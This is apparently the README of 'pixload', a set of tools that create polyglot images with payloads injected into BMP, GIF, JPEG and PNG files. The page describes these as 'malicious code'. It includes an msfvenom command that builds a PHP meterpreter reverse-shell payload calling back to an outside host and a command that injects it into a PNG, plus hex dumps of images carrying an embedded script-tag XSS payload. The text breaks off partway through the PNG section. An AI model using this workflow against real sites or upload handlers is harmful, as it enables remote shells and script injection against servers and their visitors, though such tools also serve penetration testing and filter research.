Pixload
Image Payload Creating/Injecting tools
Install / Use
/learn @sighook/PixloadREADME
pixload -- Image Payload Creating tools
DESCRIPTION
Set of tools for ~~hiding backdoors~~ creating/injecting payload into images.
The following image types are currently supported: BMP, GIF, JPG, PNG, WebP.
about
Useful references for better understanding of pixload and its use-cases:
If you want to encode a payload in such a way that the resulting binary blob is both valid x86 shellcode and a valid image file, I recommend you to look here and here.
msfvenom
If you want to inject a metasploit payload, you have to do something like this:
- Create metasploit payload (i.e. php).
$ msfvenom -p php/meterpreter_reverse_tcp \
LHOST=192.168.0.1 LPORT=31337 -f raw 2>/dev/null > payload.php
-
Edit
payload.phpif needed. -
Inject
payload.phpinto the image (i.e. png).
$ pixload-png --payload "$(cat payload.php)" payload.png
SETUP
Dependencies
The following Perl modules are required:
-
GD
-
Image::ExifTool
-
String::CRC32
On Debian-based systems install these packages:
sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl
On FreeBSD and DragonFlyBSD install these packages:
doas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32
On OSX please refer to this workaround
(thnx 2 @iosdec).
Build and Install
make install
Docker
docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload
TOOLS
pixload-bmp
Help
$ pixload-bmp --help
Usage: pixload-bmp [OPTION]... FILE
Hide Payload/Malicious Code in BMP Images.
Mandatory arguments to long options are mandatory for short options too.
-P, --payload STRING set payload for injection
-v, --version print version and exit
-h, --help print help and exit
If the output FILE already exists, then payload will be injected into this
existing file. Otherwise, the new one will be created.
Example
$ pixload-bmp payload.bmp
...... BMP Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generating output file
[✔] File saved to: payload.bmp
[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully
payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1 x 24, cbSize 10799, bits offset 26
00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/*............|
00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |..............*/|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;<script src=/|
00000030 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 3e 3c 2f 73 |/example.com></s|
00000040 63 72 69 70 74 3e 3b |cript>;|
00000047
See pixload-bmp(1) manual page for more information.
pixload-gif
Help
$ pixload-gif --help
Usage: pixload-gif [OPTION]... FILE
Hide payload/malicious code in GIF images.
Mandatory arguments to long options are mandatory for short options too.
-W, --pixelwidth INTEGER (has no effect)
set pixel width for the new image (default: 10799)
-H, --pixelheight INTEGER set pixel height for the new image (default: 32)
-P, --payload STRING set payload for injection
-v, --version print version and exit
-h, --help print help and exit
The option -W, --pixelwidth has no effect since pixload-gif rewrites
pixel width bytes with "/*" characters, to prepare the polyglot gif image.
If the output FILE already exists, then the payload will be injected into this
existing file. Otherwise, the new one will be created with specified pixels
wide.
Example
$ pixload-gif payload.gif
...... GIF Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generating output file
[✔] File saved to: payload.gif
[>] Injecting payload into payload.gif
[✔] Payload was injected successfully
payload.gif: GIF image data, version 87a, 10799 x 32
00000000 47 49 46 38 37 61 2f 2a 20 00 80 00 00 04 02 04 |GIF87a/* .......|
00000010 00 00 00 2c 00 00 00 00 20 00 20 00 00 02 1e 84 |...,.... . .....|
00000020 8f a9 cb ed 0f a3 9c b4 da 8b b3 de bc fb 0f 86 |................|
00000030 e2 48 96 e6 89 a6 ea ca b6 ee 0b 9b 05 00 3b 2a |.H............;*|
00000040 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d |/=1;<script src=|
00000050 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 3e 3c 2f |//example.com></|
00000060 73 63 72 69 70 74 3e 3b |script>;|
00000068
See pixload-gif(1) manual page for more information.
pixload-jpg
Help
$ pixload-jpg --help
Usage: pixload-jpg [OPTION]... FILE
Hide Payload/Malicious Code in JPEG images.
Mandatory arguments to long options are mandatory for short options too.
-S, --section COM|DQT set section for payload injection
-P, --payload STRING set payload for injection
-v, --version print version and exit
-h, --help print help and exit
If the output FILE already exists, then payload will be injected into this
existing file. Otherwise, the new one will be created.
Examples
- Inject payload into comment section:
$ pixload-jpg -S com payload.jpg
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generating output file
[✔] File saved to: payload.jpg
[>] Injecting payload into COMMENT
[✔] Payload was injected successfully
payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
00000000 ff d8 ff fe 00 25 3c 73 63 72 69 70 74 20 73 72 |.....%<script sr|
00000010 63 3d 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 3e |c=//example.com>|
00000020 3c 2f 73 63 72 69 70 74 3e ff db 00 43 00 01 01 |</script>...C...|
00000030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 |................|
*
00000060 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 |................|
00000070 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 14 00 |................|
00000080 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 03 ff da 00 08 01 01 00 00 00 01 3f ff d9 |...........?..|
0000009e
- Inject payload into DQT table:
$ pixload-jpg -S dqt payload.jpg
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generating output file
[✔] File saved to: payload.jpg
[>] Injecting payload into DQT table
[✔] Payload was injected succesfully
payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
00000000 ff d8 ff db 00 43 00 01 01 01 01 01 01 01 01 01 |.....C..........|
00000010 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 |................|
00000020 01 01 01 01 3c 73 63 72 69 70 74 20 73 72 63 3d |....<script src=|
00000030 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 3e 3c 2f |//example.com></|
00000040 73 63 72 69 70 74 3e ff c2 00 0b 08 00 01 00 01 |script>.........|
00000050 01 01 11 00 ff c4 00 14 00 01 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 03 ff da 00 08 01 01 |................|
00000070 00 00 00 01 3f ff d9 01 01 11 00 ff c4 00 14 00 |....?...........|
00000080 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 03 ff da 00 08 01 01 00 00 00 01 3f ff d9 |...........?..|
0000009e
See pixload-jpg(1) for more information.
pixload-png
Help
$ pixload-png --help
Usage: pixload-png [OPTION]... FILE
Hide Payload/Malicious Code in PNG Images.
Mandatory arguments to long options are mandatory for short options too.
-W, --pixelwidth INTEGER set pixel width for the new image (default: 32)
-H, --pixelheight INTEGER set pixel height for the new image (default: 32)
-P, --payload STRING set payload for injection
-v, --version print version and exit
-h, --help print help and exit
If the output FILE already exists, then payload will be injected into this
existing file. Else, the new one will be created with specified pixels wide.
Example
$ pixload-png payload.png
...... PNG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generating output file
[✔] File saved to: payload.png
[>] Injecting payload into payload.png
[+] Chunk si
